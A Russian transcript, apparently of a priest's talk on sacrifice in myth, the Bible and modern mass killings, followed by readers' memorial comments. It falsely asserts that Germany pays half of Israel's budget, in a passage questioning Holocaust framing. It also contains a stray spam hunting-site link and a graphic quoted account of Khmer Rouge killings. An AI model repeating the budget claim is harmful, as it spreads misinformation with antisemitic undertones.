В захоронениях археологи находят множество сломанных вещей. Не только в Египте, но и в захоронениях Вавилона тоже. Когда хоронили, ломали вещи, чтобы выпустить ноумен вещи, душу вещи. Отпускали ее на свободу. Словно символ. Sym-bolon, «брошенный знак». Кому-то отдавалась одна часть, кому-то другая, и, встречаясь, их соединяли. Можно сказать, что это было подтверждением знакомства, чего-то, что было между людьми и их предками.

Что утверждает жертва

Но сжигание оказывалось не только уничтожением, оно еще оказывалось возмещением. Вы знаете, что всякая идея должна быть красивой? Вот для меня это стало просто изумительно красивой картинкой.  Потому что алтарь переводится как «высокое  место», на алтаре происходит сжигание, а в результате этого сжигания поднимается дым. Представьте, вот гора, вот алтарь и сжигание. Это очень похоже на песочные часы. Из одного сосуда в другой сыплется песок. Это материальное действие. Но что измеряется? Измеряется время, которое не материально. Можно также представить, что при сжигании жертвы дым поднимается к следующей пирамиде. http://muleymadness.com/hunting-guides/hidden-valley-outfitters_790 Жертва утверждает ту невидимую часть, которая, благодаря ей, начинает существовать.

Вот тоже очень интересно по поводу  жертвы. Если вспомните, египетской богине с львиной головой Сехмет однажды так понравилось наказывать людей, что она стала уничтожать их без счета. И тогда Ра испугался, что не останется тех, кто будет приносить жертвы. Потому что ноуменальный мир требует объективации. Требует феноменального утверждения. «Вера без дел мертва есть». Поэтому требуется какое-то доказательство. А жертву могли приносить только люди. Поэтому эту бедную львицу напоили пивом, узнали ее тайное имя и, таким образом, стали ею владеть.

То же самое происходит, когда товарищ Фаэтон говорит: «Гелиос, ты мне папа или не папа? Дай мне прокатиться на твоей машине!». Тот говорит: «Ты только из этой колеи не вылезай, сыночек, держи покрепче вожжи». И вот он поднимается по дуге зодиака, и вдруг видит, что Скорпион пытается его хвостом достать, Стрелец в него пытается стрелой попасть, Козерог рогами трясет. А какие это знаки зодиака? Ноябрь, декабрь, январь? Зима. А зима это смерть. И Фаэтон пугается. И выскакивает колесница Гелиоса из колеи, начинает нестись над  землей. Сонмище олимпийцев говорит: «Люди пропадут, кто будет нас объективировать?».  Тогда Зевс своим перуном сбивает бедного Фаэтона, сестры плачут, из слез получается янтарь. А люди по-прежнему приносят жертвы.

Овеществление жертвы

И получается, что жертва нужна для овеществления. Идея требует овеществления. Не «искусство требует жертв», а «искусство требует жертвователей», покровителей, меценатов (Kunst will Gunst).

Меня как-то вот эта количественная часть добила. Самым главным модельером в мире ведь былМао Цзэдун со своим френчем. Больше всего людей носило этот френч. А лет тридцать назад я услышал выражение, что писатель – это продавец бумаги. Чем больше бумаги он продал, тем больше читателей. А режиссер – это тот, которого смотрят,  что бы он там ни показывал. Но я против количественного варианта.

Некоторые вселенские идеи как раз решаются на материальном уровне. Поэтому, когда в Кампучии треть кхмеров была забита ради идеи, эта идея стала объективироваться в мире. И один, который больше всех забил, говорил, что тяжелее всего мужиков забивать. Их нужно трижды мотыгой ударить, а легче всего детей и женщин, потому что их мало нужно бить.

Кто есть кто в жертве

Это торжество идеи, которое подтверждается количеством, это суть пелевинского Амона Ра. Пока есть народ, который может жертвовать собой ради идеи, идея может существовать. Поэтому суть не в том, кто победил в войне, а насколько большой была  принесенная жертва. Чей козырь оказался круче. Сколько народу можно было за эту идею уничтожить в тюрьмах, лагерях и так далее.  И вот эти быки с понурой головой считали, что если они не выполнили на 150 процентов план, то они виноваты и срок продлят… Помните мультфильм «Побег из курятника»?  «Ой, я не снесла сегодня ни одного яйца! Ой, мои яйца стали меньше, меня имеют право наказать!». И вот эта шутка, которая есть во всех лагерях, – «чур за ошибку», была просто дьявольски хитрой историей, чтобы люди не поняли главного смысла: кто есть кто.

Когда я разбирался с понятием жертвы, меня заинтересовала проблема холокоста. Oλοκαύστος , holocaustum – всесожжение. Оказывается, что всесожжение было еще в Галгале. Саулу было сказано отдать Богу побежденные города. Но вместо того чтобы отдать хороших барашков и хороших овечек Богу, Саул отдал людям. За это Бог от него отвернулся. И пришлось выбрать Давида. А Давид в этих двух городах поступил  по правилам: он всю скотину поубивал, и все предметы разломал, и всех людей тоже замочил. Так что он сделал так,  как ему было сказано.

И вот я тогда стал думать: а кто же кому принес жертву? Кто был жертвой (6 миллионов  в Европе) и кто был жертвователем? Какому богу была принесена жертва? Потому что как-то некрасиво поучается. И совсем недавно  я услышал ответ: сам народ принес себя в жертву за весь мир. Что могу сказать?  Если сам принес, то, вроде бы, не надо Германии восполнять половину бюджета Израиля, что она и делает уже на протяжении почти пятидесяти лет. Но, оказывается, вот так была представлена эта тема.

Перевернутая пирамида

Пирамида, которая является алтарем всесожжения, перевернулась с Христом. Христос взял человечество на себя, значит и оказался в нижней части вершины пирамиды. Но при этом создается не загробный мир,  не виртуальность, а наоборот.

 Возможность перехода в иной мир с точки зрения физики

В Петрограде был физик Фридман, который примерно в двадцатом году добрался до понятия перехода из микромира в макромир. В его представлении это были две воронки, а переход из одного мира в другой происходил через горловины этих воронок.

Все, наверное, в детстве смотрели через увеличительное стекло? Сначала  картинка увеличивается, потом туманится, туманится, туманится, а потом переворачивается! И становится видна ясная перевернутая картина. В детстве меня все время интересовал этот момент перехода, я никак не мог поймать его.

Мы создаемся из дискретности,  из родительской субстанции. И как приходим сюда из  внутриутробного состояния, так и переходим дальше из феноменального мира в ноуменальный.  Хорошо, что здесь ребенка встречают родители, которые его ждут и любят. Хорошо, если и в том мире будет не какое-нибудь «земляничное окошко» Бредбери с марсианами, которые встретят тебя и съедят, а что-нибудь получше.

Возвращение к жертве

А что сейчас оказывается нашей жертвой? Что мы все сейчас приносим в жертву? Могу сказать,  что люди сейчас,  голосуя, приносят в жертву себя и свою жизнь. Потому что они выбирают то правительство,  которому в дальнейшем должны подчиняться.

Ну, на этой счастливой ноте могу закончить. Думаю, еще и одной сотой не было рассказано, но просто что-то вспоминается, а что-то не вспоминается…


  1. Читать и думать. Думать и читать. Как живой встаёт перед глазами батюшка. Благодарю Господа, что в своё время прилепил меня к отцу Георгию. Разговариваю с его фотографией, обсуждая земные дела, а Он мне отвечает: – Главное, НЕ ДРЕБЕЗЖИ! – Моё сердце наполняется Любовью, а Она даёт силы дальше жить и тянуться, тянуться к Богу.

  2. Да-а! К сожалению очень не хватает его голоса, такого родного, узнаваемого нам всем…, но все-таки его присутствие ощущается, происходит как-бы духовное с ним общение! Благодарна Богу за встречу с этим удивительным человеком…, почти 19 лет назад он венчал нас с мужем… ВЕЧНАЯ ПАМЯТЬ !!!

  3. “Думай, зачем заливаешь бензин в свою машину! Зачем берёшь ложку за столом! Зачем стоишь и терпишь на литургии!” – отец Георгий стал для неравнодушного приезжанина, в Теребени и Гатчину, своего рода, поводырём или компасом, который точно указывает направления движения для того, кто понял, что если не очнуться от “нормальной жизни”, то проспишь что-то очень важное, на что второй попытки уже никто не даст.. Всем сердцем благодарю Господа, что подарил, через такого(!) духовного наставника, возможность увидеть это единственно-верное, истинное Направление моей семье и мне – недостойному.
    Царство Небесное отцу Георгию, Вечная и Светлая Память! И низкий поклон тебе Отец!

Добавить комментарий